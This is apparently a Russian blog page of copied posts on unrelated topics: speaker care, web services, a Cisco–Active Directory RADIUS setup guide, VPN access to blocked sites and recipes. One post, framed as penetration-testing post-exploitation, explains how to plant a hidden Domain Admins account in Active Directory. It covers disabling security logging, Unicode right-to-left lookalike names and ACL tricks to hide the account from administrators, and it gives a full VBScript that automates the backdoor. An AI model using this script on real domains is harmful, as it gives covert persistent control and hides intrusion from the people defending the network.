Простой способ улучшить звучание своей акустики

Со временем резиновые подвесы акустических систем теряют эластичность из-за старения материала, что негативно сказывается на качестве звука. Как улучшить звучание сабвуфера и других динамиков за 10 минут?

Использовав эту чудо-жидкость для пропитки подвеса сабвуфера, вы будете поражены результатом! Басы станут мягче, глубже и отчётливее, с упругой «оттяжкой».
Попробуйте на широкополосном динамике! Тот же положительный эффект! Увеличится диапазон, появятся ярко выраженные обертоны, в диапазоне ниже 400 Гц – это просто чудо!

Есть смысл пропитать подвесы всех динамиков в доме и автомобиле, и делать это раз в полгода. Хуже не будет, будет только лучше!
Кстати, жидкость продается в отделах автокосметики и стоит недорого. Цена вопроса от 200 до 260 руб.

 Простой способ улучшить звучание своей акустики

Вот так выглядит чудо-жидкость

 

 Простой способ улучшить звучание своей акустики

Промазываем подвес широкополосного динамика

 

 Простой способ улучшить звучание своей акустики

Промазываем подвес сабвуфера

 

 Простой способ улучшить звучание своей акустики

Промазываем подвесы всей домашней акустики

Копипаст: http://masterkit.lifehacker.ru/2012/01/11/prostoj-sposob-uluchshit-zvuchanie-svoej-akustiki/

Информация не проверена, используйте на свой страх и риск =)

Backdoor в Active Directory #2

В начале прошлого года мною уже поднималась тема пост-эксплуатации в домене Microsoft Active Directory. В предложенном ранее подходе рассматривался вариант ориентированный больше на случай утери административных привилегий, нежели их непосредственное использование. При этом само действо по возврату этих привилегий подразумевало «шумные» события и визуально палевные манипуляции в каталоге. Другими словами, для того, чтобы вернуть себе административные привилегии в домене, требовалось стать участником соответствующей группы безопасности, например, группы «Domain Admins».
Надо сказать, что администраторы очень волнуются, когда неожиданно осознают присутствие в своей системе кого-то еще. Некоторые из них бросаются всеми силами обрабатывать инцидент безопасности. Порой, самыми непредсказуемыми действиями icon wink Backdoor в Active Directory #2 )
m1 Backdoor в Active Directory #2

Теперь представьте, как себя может повести администратор Active Directory в крупной компании, при виде незнакомого идентификатора в группе безопасности «Enterprise Admins»? В случае если кто-то залился не понарошку, тогда озабоченность администратора полностью оправдана. Но в случае недостаточного противодействия при проведении пентеста, шибко волноваться явно не стоит (ровно, как лишать парней точек входа и добытых потом и кровью привилегий).

Я долго размышлял над тем, как, не пугая администраторов, свободно пользоваться достигнутыми привилегиями в ходе проведения тестирования на проникновение (особенно на фоне агрессивного противодействия со стороны администраторов на последних работах). С одной стороны, при проведении пентеста мы сильно ограничены в возможностях. Например, правило по минимизации воздействия на объект исследования – это как само собой разумеющееся. Поэтому наплодить и раскидать бэкдоров по захваченной сети мы попросту не можем. С другой стороны, есть совершенно понятные цели, к которым требуется прийти до того момента, как радостный администратор заметит несанкционированную активность и выдернет шнур из розетки.

Так как же можно оставаться незамеченным в сетях Microsoft?

Первое, что приходит в голову — использовать учетную запись администратора. Доступ легитимный, поэтому он не должен привлекать к себе особое внимание. Но, как показывает практика, не всегда удается получить пароль администратора в открытом виде. В этих случаях на помощь спешит атака, известная под названием Pass-the-Hash. Было бы почти все замечательно (почти, потому как Pass-the-Hash сужает возможности по развитию атаки, например, нельзя воспользоваться протоколом удаленного управления RDP), но в серьезных компаниях администраторы потихоньку переходят на смарт-карты, что не позволяет использовать атаки, основанные на недостатках протокола NTLM. Хорошо, но есть же еще возможность использования токена авторизованного пользователя (eq incognito) и/или билета Kerberos (eqWCE). Так-то оно конечно так, но на практике Kerberos не керберос и токен не токен:( Доступный инструментарий по проведению данных видов атак, к сожалению, откровенно лажает. Кроме того, в обоих случаях, ровно как с атакой Pass-the-Hash, действия атакующего весьма ограничены используемыми протоколами, поддерживающими SSO в домене.

Таким образом, самый привлекательный путь — это использование привилегий, если уж не существующего, так созданного идентификатора администратора домена с известным паролем…

Как при этом не нарваться на бдительный глаз администратора домена?

Во-первых, внесение изменений в каталог Active Directory порождает соответствующие события, о которых администратору лучше не знать. Поэтому перед заливкой в домен (разумеется, только при проведении тестирования на проникновение и после согласования сего действа с ответственным лицом на стороне заказчика) рекомендуется отключить ведение событий безопасности на контролерах домена посредством соответствующего GPO. Напомню, что по умолчанию время фонового обновления групповых политик для контроллеров домена составляет 15 минут.

Во-вторых, никто не мешает создать визуально идентичную учетную запись, аналогичную существующему администратору домена. Для этого, например, могут использоваться символы юникода (!). Далее, созданному пользователю выставляется атрибут «showInAdvancedViewOnly» в значение «TRUE», что позволит скрыть объект в стандартном режиме просмотра оснастки «Управления пользователями и компьютерами» (dsa.msc). После чего, осталось поместить этого пользователя в одну из административных групп, свободную от реального администратора домена (прим., как правило, администраторы любят воткнуть свою учетную запись во все мыслимые и не мыслимые административные группы; например, оставим администратора в группе «Enterprise Admins», а клона поместим в группу «Domain Admins»).

Но я думаю, что многие из читателей уже засомневалась в успехе компании. И они правы! Этот способ никуда не годится, т.к. в нем присутствуют два существенных недостатка:
1. Созданный идентификатор пользователя виден в каталоге «вооруженным глазом».
2. При поиске пользователей в домене, учетная запись администратора начинает двоиться.

Как можно решить эти проблемы?

Казалось бы, самое простое решение на поверхности – правильно настроить права доступа к создаваемому объекту (нашему пользователю). Для этого достаточно группе «Everyone» запретить читать публичную информацию у объекта. И в организационной единице, рядом с реальным администратором Active Directory повиснет «нечто», что как минимум перестанет светиться при поиске пользователей в домене. Однако сказка продлится не более, чем 60 минут:( Дело в том, что по умолчанию каждые 60 минут на контроллере домена, выполняющего роль эмулятора PDC, запускается процесс «SDPROP», который восстанавливает права доступа у ряда объектов Active Directory (в том числе, у всех членов групп администраторов) в соответствии с установленными правами доступа на объект «AdminSDHolder» (http://technet.microsoft.com/en-us/query/ee361593).

К сожалению, отключить указанный механизм безопасности штатными возможностями невозможно. Хак с правами доступа на объект может привести к проблемам с репликацией (а тут уже попахивает какой-то диверсией; при пентесте низя). Перезапись прав доступа на «AdminSDHolder» затронет множество объектов, включая идентификаторы всех администраторов домена. Таким образом, одним из возможных полезных решений, может быть регулярный запуск сценария, который будет исправлять погрешности процесса «SDPROP», но есть и более перспективная альтернатива.

Процесс «SDPROP» восстанавливает права доступа (ACE) только на конкретные привилегированные объекты, при этом права доступа для организационных единиц, в которых содержатся подобные объекты, остаются неизменными. Этим-то как раз и можно воспользоваться! Нам ведь никто не мешает, используя символы юникода, создать аналогичную последовательность организационных единиц, аналогично той последовательности, в которой содержится клонируемый идентификатор. При этом, «правильные» права доступа на вышестоящий контейнер позволят его визуально скрыть от посторонних глаз (разумеется в пределах разумного).

m2 Backdoor в Active Directory #2

m3 Backdoor в Active Directory #2

Смысл подобного подхода заключается в том, что у администратора Active Directory не должны появиться нездоровые подозрения на тему того, что доверенная ему система была скомпрометирована. Он по-прежнему остается действующим администратором, разве что членом одной из привилегированных групп является визуально идентичная учетная запись…

И последнее. Для того чтобы созданный клон не дублировался в поиске по каталогу можно воспользоваться, например, символом «202E» (респект Александру Зайцеву за напоминалку). Указанный символ переворачивает строку, расположенную за ним. Таким образом, если мы, к примеру, создаем клон для идентификатора «dmitry.ivanov», создаваемый идентификатор будет иметь вид «202E»+«vonavi.yrtimd». Возможно, такой подход не так удобен для прохождения аутентификации, но от попадания в поиск по каталогу спасает.

m4 Backdoor в Active Directory #2

С точки зрения журналов безопасности, рассматриваемый подход также позволяет оставаться незамеченным до определенного момента.

m5 Backdoor в Active Directory #2

Ниже представлен сценарий, который автоматизирует все выше сказанное. Настраиваемые параметры:

strAdminsamAccountName – идентификатор, который требуется с клонировать
strAdminsGroup – привилегированная группа, в которую следует поместить клона
strPassNewUser – задаваемый пароль новому пользователю

On Error Resume Next

strAdminsamAccountName = «dmitry.ivanov»
strAdminsGroup = «Domain Admins»
strPassNewUser = «P@ssw0rd»

‘ — — — Dim arrContainer(), i

Set objRootDSE = GetObject(«LDAP://RootDSE»)
strDomain = objRootDSE.Get(«DefaultNamingContext»)
Set objDomain = GetObject(«LDAP://» & strDomain)

strAdminsamAccountNameDN = SearchDN(«‘ WHERE objectCategory=’user’ AND samAccountName = ‘» & strAdminsamAccountName & «‘»)

If Not IsNull(strAdminsamAccountNameDN) Then

Set objAdmin = GetObject(«LDAP://» & strAdminsamAccountNameDN)
Set objOU = GetObject(objAdmin.parent)

i=0
Call EnumOUs(objOU)

For j = i-1 To 0 Step -1

if strContainer=»" Then
strContainer = «OU=» & arrContainer(j) & strContainer
primaryContainer = strContainer
Else
strContainer = «OU=» & arrContainer(j) & «,» & strContainer
End if
Set objOUcreate = objDomain.Create(«organizationalUnit», strContainer)
objOUcreate.SetInfo
Next

Set objContainer = GetObject(«LDAP://» & strContainer & «,» & strDomain)

Set objUserCreate = objContainer.Create(«User», «cn=» & ChrW(8238) & StrReverse(objAdmin.displayName))
objUserCreate.Put «sAMAccountName», ChrW(8238) & StrReverse(strAdminsamAccountName)
objUserCreate.SetInfo
On Error Resume Next

objUserCreate.SetPassword strPassNewUser
objUserCreate.Put «userAccountControl», 66048
objUserCreate.Put «givenName», ChrW(8238) & StrReverse(objAdmin.givenName)
objUserCreate.Put «sn», ChrW(8238) & StrReverse(objAdmin.sn)
objUserCreate.Put «initials», ChrW(8238) & StrReverse(objAdmin.initials)
objUserCreate.SetInfo
On Error Resume Next

objUserCreate.Put «showInAdvancedViewOnly», «TRUE»
objUserCreate.SetInfo
On Error Resume Next

NewUserDN = «cn=» & ChrW(8238) & StrReverse(objAdmin.displayName) & «,» & objContainer.distinguishedName

strAdminsGroupDN = SearchDN(«‘ WHERE objectCategory=’group’ AND samAccountName = ‘» & strAdminsGroup & «‘»)

If Not IsNull(strAdminsGroupDN) Then
Set objGroup = GetObject(«LDAP://» & strAdminsGroupDN)
objGroup.PutEx 4, «member», Array(strAdminsamAccountNameDN)
objGroup.SetInfo
objGroup.PutEx 3, «member», Array(NewUserDN)
objGroup.SetInfo
End If

OUAddAce(primaryContainer & «,» & strDomain)

End If

Function SearchDN(str)
Set objConnection = CreateObject(«ADODB.Connection»)

objConnection.Provider = «ADsDSOObject»
objConnection.Open «Active Directory Provider»

Set objCommand = CreateObject(«ADODB.Command»)
Set objCommand.ActiveConnection = objConnection
objCommand.Properties(«Searchscope») = 2

objCommand.CommandText = «SELECT distinguishedName FROM ‘LDAP://» & strDomain & str
Set objRecordSet = objCommand.Execute
If Not objRecordSet.EOF Then
SearchDN = objRecordSet.Fields(«distinguishedName»).Value
End if
End Function

Sub EnumOUs(objChild)
Dim objParent

Set objParent = GetObject(objChild.Parent)
If (objParent.Class = «organizationalUnit») Then
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou
i=i+1
Call EnumOUs(objParent)
Else
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou & ChrW(128)
i=i+1
End If
End Sub

Function OUAddAce(OU)

Dim objSdUtil, objSD, objDACL, objAce
Set objOU = GetObject («LDAP://» & OU)

Set objSdUtil = GetObject(objOU.ADsPath)
Set objSD = objSdUtil.Get(«ntSecurityDescriptor»)
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject(«AccessControlEntry»)

objAce.Trustee = «Everyone»
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = «{E48D0154-BCF8-11D1-8702-00C04FB96050}»
objDacl.AddAce objAce

objSD.DiscretionaryAcl = objDacl
objSDUtil.Put «ntSecurityDescriptor», Array(objSD)
objSDUtil.SetInfo

Set objNtSecurityDescriptor = objOU.Get(«ntSecurityDescriptor»)
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put «ntSecurityDescriptor», objNtSecurityDescriptor
objOU.SetInfo

End Function

Копипаст: http://habrahabr.ru/blogs/infosecurity/135915/

Dropbox Automator — автоматизация сервиса Dropbox

Сервис Dropbox является популярнейшим инструментом для облачного хранения и синхронизации данных, который имеет огромную армию пользователей. Поэтому не удивительно, что этот сервис оброс целым букетом дополнительных утилит и сервисов, добавляющие в Dropbox целый ряд дополнительных функций. Сегодня мы хотим вас познакомить с одним из таких сервисов под названием Dropbox Automator. С его помощью вы превратите дропбокс в универсальный автоматический комбайн по переработке файлов.

 Dropbox Automator — автоматизация сервиса Dropbox

Dropbox Automator — это специальный сервис, который мониторит папку Dropbox и автоматически выполняет с новыми файлами заданные вами действия. Например, при добавлении документов сервис может загружать их в Google Docs или конвертировать в PDF, с картинками сервис может выполнять основные операции изменения размера, вращения. Наложить лого, загрузить на Facebook и так далее. Всего доступно более двадцати различных операций.

 Dropbox Automator — автоматизация сервиса Dropbox

Использование Dropbox Automator требует сначала авторизовать этот сервис в Dropbox, затем указать папку, которая будет отслеживаться, после чего можно уже выбрать нужное действие. Некоторые операции требуют задать дополнительные параметры, что можно сделать прямо на этой же странице.

Dropbox Automator является очень интересным сервисом, значительно расширяющий сферу применения облачного хранилища Dropbox. Благодаря широкому выбору автоматизированных операций мы можем запрограммировать сервис на выполнение нужных нам действий, облегчая нам жизнь в случае необходимости простых, часто повторяющихся операций с файлами, изображениями и документами.

Dropbox Automator

Копипаст: http://lifehacker.ru/2012/01/09/dropbox-automator

Ваша книжная полка в сети: Bookmate

Bookmate на сегодня является самым интересным проектом подобного рода в русскоязычном сегменте сети. Давайте посмотрим, какие заслуги обеспечили этому сервису столь высокую популярность среди любителей книг.

 Ваша книжная полка в сети: Bookmate

Bookmate — это онлайновая библиотека, которая предоставляет целый ряд возможностей для комфортного хранения и чтения книг. Как и в любой порядочной библиотеке прежде всего необходимо завести абонемент, то есть пройти процесс регистрации. После этого вам станет доступно более 5000 бесплатных книг из фонда библиотеки, в основном классическая литература. Кроме этого, вы сможете загружать свои книги в форматах fb2 и ePub, которые будут сохранены в вашей личной библиотеке.

 Ваша книжная полка в сети: Bookmate

Книги, находящиеся в вашей библиотеке, представлены в виде симпатичных томиков с отображением названия и автора, а когда это возможно и изображения обложки. Недавно добавленные книги отображаются в разделе В обработке, находящиеся в процессе чтения — Читаемые, а уже законченные перемещаются в разделПрочитанное. Кроме этого, можно создавать свои списки (полки) и распределять по ним свои книги как вам удобно.

Любую книжку из вашей библиотеки можно открыть во встроенной читалке. Ее внешний вид оптимизирован для наиболее комфортного чтения с экрана вашего устройства, однако если у вас особые требования, то вы легко сможете настроить шрифт на свой вкус.

 Ваша книжная полка в сети: Bookmate

Но самой сильной стороной Bookmate является наличие клиентов для разных мобильных платформ (Android, iPhone, iPad, Symbian)  и возможность синхронизации данных между ними. Таким образом, вы можете начать чтение на десктопе с помощью браузера, а продолжить уже с мобильного телефона или планшета, причем именно с того места, где вы остановились. Книга при этом может полностью загружаться на ваше устройство, так что продолжать чтение можно и без подключения к сети.

Как и всякое современное веб-приложение Bookmate имеет и социальную составляющую. Так, вы можете делиться прочитанным в Twitter, Facebook или Вконтакте, получать рекомендации, добавлять других пользователей в друзья, видеть их список чтения и брать книги с их полок.

Онлайновый сервис Bookmate является на сегодняшний день самой совершенной библиотекой, предоставляя даже при бесплатной модели использования полный набор функций для удобного коллекционирования и чтения книг. Впрочем, мы попробуем поискать достойную альтернативу в следующих статьях.

 

Копипаст:  http://lifehacker.ru/2011/11/26/vasha-knizhnaya-polka-v-seti-bookmate/

Аутентификация на сетевых устройствах CISCO средствами Active Directory

Интеграция CISCO AAA и Microsoft Active Directory

Наверняка многие системные администраторы рано или поздно сталкиваются с проблемой аутентификации на сетевых устройствах. Если руководствоваться best-practices, то учетные записи должны быть персонифицированными, пароли должны отвечать критериям устойчивости, время жизни паролей должно быть ограничено. Также не будем забывать о разграничении уровней доступа в соответствии с выполняемыми задачами и поддержке актуальности базы пользователей, связанной с изменениями в штате сотрудников. При соблюдении этих требований ведении базы пользователей на каждом устройстве становится трудоемкой и нетривиальной задачей, а на практике часто просто игнорируется, администраторы ограничиваются заданием паролей на физическую и виртуальную консоль и заданием пароля суперпользователя (enable). Логичным решением этой проблемы является ведение единой базы пользователей с контролем выдвигаемых к учетным записям требований. Если у нас есть Active Directory, почему бы не использовать его?

image001 Аутентификация на сетевых устройствах CISCO средствами Active Directory
Рис.1 Топология системы


Все не так просто – устройства Cisco не предоставляют механизма для аутентификации средствами LDAP, коим является MS ActiveDirectory, напрямую. Для решения этой задачи CISCO в своих решениях предоставляет механизм AAA(Authentication Authorization Accounting). Дабы не растягивать статью, за деталями отсылаю к первоисточнику [1], также вот неплохая статься описывает основные возможности [2]. Вкратце, клиент AAA отправляет ученые данные к серверу аутентификации, и основываясь на его ответе (либо отсутствии ответа) принимает решении об отказе или предоставлении запрашиваемого доступа.
В качестве сервера аутентификации AAA позволяет использовать RADIUS либо TACAS+ сервер. На первый взгляд по описанию возможностей предпочтительней TACAS+, но основной его недостаток в том, что это закрытое решение от CISCO и его реализация существует только для *nix систем [3]. Протокол же RADIUS является открытым промышленным стандартом, для которого существует множество реализаций, в том числе и встроенная в Windows Server 2000/2003 служба IAS (Internet Authentication Service). В Windows Server 2008 вместо службы IAS поставляется служба Network Policy Server [4].

Топология

Система аутентификации сетевых устройств Cisco средствами LDAP домена Active Directory в простейшем случае имеет топологию изображенную на рисунке 1. Администратор со своего рабочего места подключается к виртуальному терминалу сетевого устройства. Согласно настроенным политикам ААА, устройство запрашивает логин и пароль, после чего передает логин и хеш пароля RADIUS серверу. RADIUS сервер средствами Active Directory аутентифицирует пользователя и проверяет, является ли он членом административной группы. Если пользователь успешно прошел аутентификацию, сетевое устройство Cisco получает от RADIUS сервера подтверждение об успешном прохождении аутентификации и авторизации, и разрешает пользователю подключение, в противном случае сообщает о неуспешной аутентификации и закрывает соединение.
Аутентификация пользователей на сетевом оборудовании будет происходить средствами ActiveDirectory посредством RADIUS, авторизация доступа — на основе принадлежности к одной из двух групп, соответственно разрешающих непривилегированный (User exec mode) и привилегированный (Privilege exec mode) доступ к устройству. В дальнейшем, можно разделить доступ по ролям, сконфигурировав на устройствах профили с разрешением запускать необходимые команды и связав каждый профиль с соответствующей группой AD.

Настройка MS ActiveDirectory

Предполагаем, что политики безопасности для длины, сложности паролей, времени их жизни и пр. уже внедрены. И так, для начала создадим две группы безопасности (Security group) gsgrCiscoUserEXEC иgsgrCiscoPrivEXEC:
Теперь создадим учетные записи администраторов PetrovI и IvanovP, сделав их членами группgsgrCiscoUserEXEC и gsgrCiscoPrivEXEC соответственно. Таким образом видим что PetrovI будет непривилигированным пользователем, а IvanovP — привилегированным.
На этом с AD все.

Настройка MS Internet Authentication Service

Если на сервере еще не установлена служба IAS, то ее необходимо джоустановить. Для этого необходимо в панели управления выбрать “Add/remove programs” -> “Add/remove Windows components”, выбрать пункт “Network Services”, нажать кнопку Deteils (Дополнительно), выбрать пункт “Internet Information Service (IIS)” и еще раз нажать Deteils (Дополнительно), выбрать Internet Authentication Serviceю
Открываем оснастку Internet Authentication Service и создаем новую политику удаленного доступа (Remote Access Policies -> RClick -> New Remote Access Policy) с названием CiscoAAA_AD. В открывшемся окне Select Attribute выбираем Authentication Type и добавляем CHAP,
критерий – принадлежность пользователей к ранее созданной группе gsgrCiscoUserEXEC. Выбираем пункт Windows-Groups, добавляем gsgrCiscoUserEXEC.
И самое главное – выбираем атрибут “Service-Type” = Login для пользовательского и Administrative – для привилегированного доступа:

image012 Аутентификация на сетевых устройствах CISCO средствами Active Directory
Рис.2. Выбираем атрибут Service Type

В завершение мастера, выбираем пункт “Grant remote access permission”
Теперь необходимо создать учетные записи для устройств, к которым будет выдаваться доступ. Для этого в оснастке IAS выбираем пункт RADIUS Clients -> RClick -> New RADIUS Client,

image014 Аутентификация на сетевых устройствах CISCO средствами Active Directory
Рис.3. Создаем учетную запись устройства

в появившемся окне вводим дружественное имя, например Switch1 и IP адрес устройства, жмем Next, выбираем “Client-Vendor” = “Cisco”, вводим ключ для аутентификации RADIUS сервера и клиента (рис. 4).

image016 Аутентификация на сетевых устройствах CISCO средствами Active Directory
Рис. 4. Данные для аутентификации RADUIS сесии 

Настройка со стороны IAS завершена, переходим к настройке сетевых устройств.

Настройка сетевого устройства Cisco на примере коммутатора Catalyst 2960

!включаем шифрование паролей
service password-encryption
!задаем пароль для привилегированного режима
enable secret *******
!!! ВНИМАНИЕ!!!
! AAA работает таким образом, что если не получен ответ от сервера, клиент
! предполагает аутентификацию неуспешной
! Обязательно создаем локального пользователя на случай
! если RADIUS сервер недоступен по какой-либо причине,
! печатаем на листике, заворачиваем в конверт и прячем в сейф.
username recover password *********
! Включаем ААА
aaa new-model
!Необязательно. Баннер о том, что это закрытая система и делать здесь нечего
aaa authentication banner ^ Access only for persons explicitly authorized. All rights reserved.
^
!Сообщение на случай неуспешной аутентификации. Полезно при отладке
aaa authentication fail-message ^ Authentication failed
^
!Создаем профиль аутентификации
!Не забываем как резервный указать локальный способ аутентификации
aaa authentication login login-RADIUS group radius local
!Создаем профиль авторизации.
aaa authorization exec auth-RADIUS-exec group radius local
!По умолчанию клиент ААА трижды пытается авторизоваться через RADIUS.
!Дабы не блокировать учетные записи в AD, ставим 1 попытку
radius-server retransmit 1
!Указываем наш RADUIS сервер
radius-server host 10.0.0.2
!Задаем ключ для шифрования
radius-server key SupErkEy
!
! Включаем созданные профили для виртуальных консолей
line vty 0 15
exec-timeout 15 0
login authentication login-RADIUS
authorization exec auth-RADIUS-exec
timeout login response 180
no password

Настройка завершена, перехолим к тестированию.

Проверяем работу

image017 Аутентификация на сетевых устройствах CISCO средствами Active Directory
Рис. 5. Проверка работы

Отладка

Не всегда все идет хорошо. На этот случай следует воспользоваться командами отладки Cisco IOS:

# debug radius events
# debug aaa authentication
# debug aaa authorization
# debug aaa protocols
# debug radius [authentication | elog | verbose]

А так же не забываем смотреть в Event log AD и IAS.

Заключение

Таким образом, потратив некоторое время на централизацию учетных записей, мы сэкономим много времени в будущем и уменьшим риск компрометации учетных записей. В случае ошибки администратора будет легко выявить виновника по его учетным данным, а так же разграничить права доступа к устройствам, ограничив администраторов в правах согласно их обязанностям

Источники

1) Authentication, Authorization, and Accounting Overview [http://www.cisco.com/en/US/products/ps6638/products_data_sheet09186a00804fe332.html]
2) Настройка AAA на CISCO — краткий обзор [http://faq-cisco.ru/index.php?option=com_content&task=view&id=26&Itemid=30]
3) Remote Authentication Dial In User Service (RADIUS) [http://en.wikipedia.org/wiki/RADIUS]
4) Understanding the new Windows Server 2008 Network Policy Server http://www.windowsnetworking.com/articles_tutorials/Understanding-new-Windows-Server-2008-Network-Policy-Server.html]

Перепечатано: http://habrahabr.ru/blogs/sysadm/135419/

DriverPack Solution 12

main DriverPack Solution 12

DriverPack Solution — не простой установщик драйверов.
Функции диагностики компьютера и создания бэкапов драйверов делают его незаменимым для любого сисадмина! Быстро определит ваши железки по ID и поставит из своего пака или скачает с инета.
Функция: «Бэкап драйверов»

Бэкап из Windows
Создайте резервную копию драйверов уже установленных в Вашей системе, это снизит к минимуму риски при обновлении или переустановке Windows.

Бэкап из DriverPack Solution
Можно создать пакет драйверов специально под конфигурацию данного компьютера и сохранить его! Будет полезно, например, если потерялись родные диски или они уже устарели.

backup DriverPack Solution 12

Функция: «Диагностика компьютера»

С помощью DriverPack Solution 12 легко оценить состояние всех ключевых показателей работы Вашего ПК!

diagnistics2 DriverPack Solution 12
diagnistics1 DriverPack Solution 12

Диагностика: «Процессор»
В случае длительного перегрева компьютер может выйти из строя, поэтому контроль за температурой процессора очень важен. DriverPack Solution оповестит Вас о перегреве процессора, как только его обнаружит, и подскажет как это исправить.
DriverPack Solution 12 научился «общаться» с процессорами второго поколения (Intel i3,i5,i7)

Диагностика: «Жесткий диск»

Все возможные проблемы с жестким диском отслеживаются автоматически. Например, если жесткий диск уже начал сыпаться, то DriverPack Solution оповестит вас об этом. Это работает по технологии SMART.

Кроме того Вы увидите оповещение о нехватке свободного пространства, если оно уже подходит к концу. А прямо из окна DriverPack Solution можно запустить процесс дефрагментации и очистки системы.

«Антивирусный контроль»

Нередко встречаются компьютеры, сбои которых возникают из-за двух установленных одновременно антивирусов. DriverPack Solution быстро определит такую проблему и предложит удалить один из них. Так же, если антивирус устарел, выключен или не установлен вовсе, то Вы первым об этом узнаете!

Для антивирусной профилактики мы советуем провести проверку «портативной» версией антивируса, которые не требует установки. Для этого нажмите на кнопку «Проверить» в окне диагностики программыDriverPack Solution!

Диагностика: «Тест оперативной памяти»

Синий экран, внезапные перезагрузки, сбои системы… Причиной всему этому может быть сбой оперативной памяти. DriverPack Solution позволит «прогнать» оперативку в режиме теста и проверить её.

Функция: «Жалоба на драйвер»

99% проблем, которые могут возникнуть в работе с программой DriverPack Solution вызваны наличием в её базе кривых драйверов. Теперь мы запустили функцию для сбора жалоб от экспертов!

Что нового в DriverPack Solution 12?

  • Обновлены базы драйверов!
  • Новый, приятный дизайн левой панели!
  • Добавлена функция «Бэкап драйверов»!
  • «Бэкап драйверов из Windows»!
  • «Бэкап драйверов из DriverPack Solution»!
  • Добавлена функция: «Диагностика компьютера»!
  • Новая система определения имени компьютера или материнской платы!
  • Определение версии BIOS!
  • Тестирование оперативной памяти на сбои.
  • Отслеживание здоровья жесткого диска, свободного пространства на нём и возможность дефрагментации!
  • Обновлён антивирусный контроль: мониторинг активности антивируса и актуальности его баз. А так же функция проверки на вирусы «портативной» версией антивируса!

+ ко всему вы можете получить автоматическую установку необходимого софта. (антивирус, архиватор, кодеки и тд) — вот тут будьте аккуратны. Если не хотите увидеть у себя на компьютере всякие майл-ру-агенты и яндекс бары, то убирайте галочку напротив установки программ.

Офф. сайт: drp.su

Копипаст: http://habrahabr.ru/blogs/i_am_advertising/135394/

Хочется — Причина — Содержится в

x 0e923c4c Хочется   Причина   Содержится в

Три простых способа читать заблокированные сайты

 Три простых способа читать заблокированные сайты

VPN-туннель в один клик

Для чтения заблокированных ресурсов нужно сделать всего одну вещь — завернуть свой трафик в VPN (шифрованный туннель данных) и никто его заблокировать не сможет, так как не понятно что по нему идет. Я не буду рассказывать как поднять такой туннель или купить доступ к удаленному сервису, так как есть решение проще. У меня давно была установлена программа TunnelBear (есть версия для Windows и Mac), которая в один клик поднимает VPN с конечной точкой в США или Великобритании. Я использовал ее ранее для открытия аккаунта в Spotify и Google Music, выдавая себя за британца icon smile Три простых способа читать заблокированные сайты Программа предоставляет бесплатно 500 Мб трафика в месяц и каждый месяц эта цифра обновляется. Все, что вам нужно для чтения заблокированных сайтов — установить TunnelBear и включить туннель. Через 10 секунд и ЖЖ в Казахстане и YouTube в Турции и все другие сайты будут для вас открыты так, словно вы житель Британии или США.

 

Если 500 Мб вам окажется недостаточно, то за $4,95 в месяц или $49,99 в год вы сделаете ваш интернет абсолютно свободным.

Читайте ЖЖ через RSS

Читать записи Живого Журнала вы можете не только с использованием туннелирования, но и просто подписавшись на RSS-фид желаемого блога.

Читайте сайты в Opera

А еще, в браузере Opera есть режим экономии трафика, который пропускает весь интернет-трафик через проксирующие сервера Opera, так что номинально вы получаете трафик не с ЖЖ, а с облака Opera. icon smile Три простых способа читать заблокированные сайты Вот так я в опере в один клик получил доступ к заблокированному ЖЖ.

 Три простых способа читать заблокированные сайты

Копипаст

Быстрый омлет в пакете

Изначально этот рецепт был придуман для того, чтобы готовить на катере, так как там мало посуды, и нет возможности готовить сразу на большое количество человек. Однако вы можете воспользоваться им в качестве развлечения для гостей или в почти походных условиях при минимальном количестве посуды.

 Быстрый омлет в пакете
Ингредиенты: яйца, соль, перец, сыр, помидоры, сладкий перец, колбаса, ветчина, лук, горошек – в общем, всё, с чем вообще может быть омлет.
Приготовление. Вручаете участникам банкета по пластиковому пакету для заморозки с зипером, 2 яйца (больше может не приготовиться нормально), соль, перец и остальные ингредиенты, которые у вас есть. Теперь просто нужно вбить яйца в пакет, добавить свои любимые добавки к омлету и все хорошенько взболтать. После чего полагается выпустить воздух из пакета, застегнуть его и отправить в кастрюлю с кипящей водой примерно на 13 минут.
Получается обычный омлет, но его основная фишка состоит в том, что одновременно может готовиться до восьми омлетов с разными начинками (в зависимости от величины кастрюли)!
Фотография взята у автора этого поста.

Как правильно чистить гранат.

6457919309 a5bb8112dd Как правильно чистить гранат.

Увидела мастер-класс продавца на рынке. Показывал, как правильно чистить гранаты. Пришла домой, попробовала – получилось! Знаю, что многие любят гранаты, но не едят, потому что ковыряться в них долго и не очень удобно. Потом еще и пальцы рыжеют. Вот как быстро и эффективно почистить гранат. Инструкция в картинках.
6457891961 4698f6b26c Как правильно чистить гранат.
Моем гранат. На этом этапе желательно повязать фартук, чтобы уберечь одежду от случайных брызг сока.
Срезаем ножом верхушку с хвостиком так, чтобы в срезе появились белые прожилки.
6457898397 0ac4337bba Как правильно чистить гранат.
Вдоль этих светлых прожилок делаем неглубокие  надрезы.
6457905817 3995ed9df9 Как правильно чистить гранат.
Переворачиваем гранат – срезом вниз. Берем столовую ложку и начинаем постукивать по кожуре. Постукивания уверенные и равномерные – и зерна гранатовые начнут прыгать в посудину. Не бойтесь повредить зерна. Продавец на рынке вообще ручкой ножа выбивал зерна из граната – все были целы.
Желательно, чтобы посуда  была с высокими стенками – на случай, если гранат сочный. Фартук по-прежнему не помешает.
6457911883 80e12f248f Как правильно чистить гранат.
В итоге – тарелка с готовым к употреблению гранатом и цветок гранатовый:)
6457919309 a5bb8112dd Как правильно чистить гранат.
Витаминизируйтесь!
Это важно: свежевыжатый сок может быть опасен, если пить его в концентрированном виде. Обязательно добавьте воды.
6457930783 3932e82618 Как правильно чистить гранат.
Текст и фото – Антипедагогика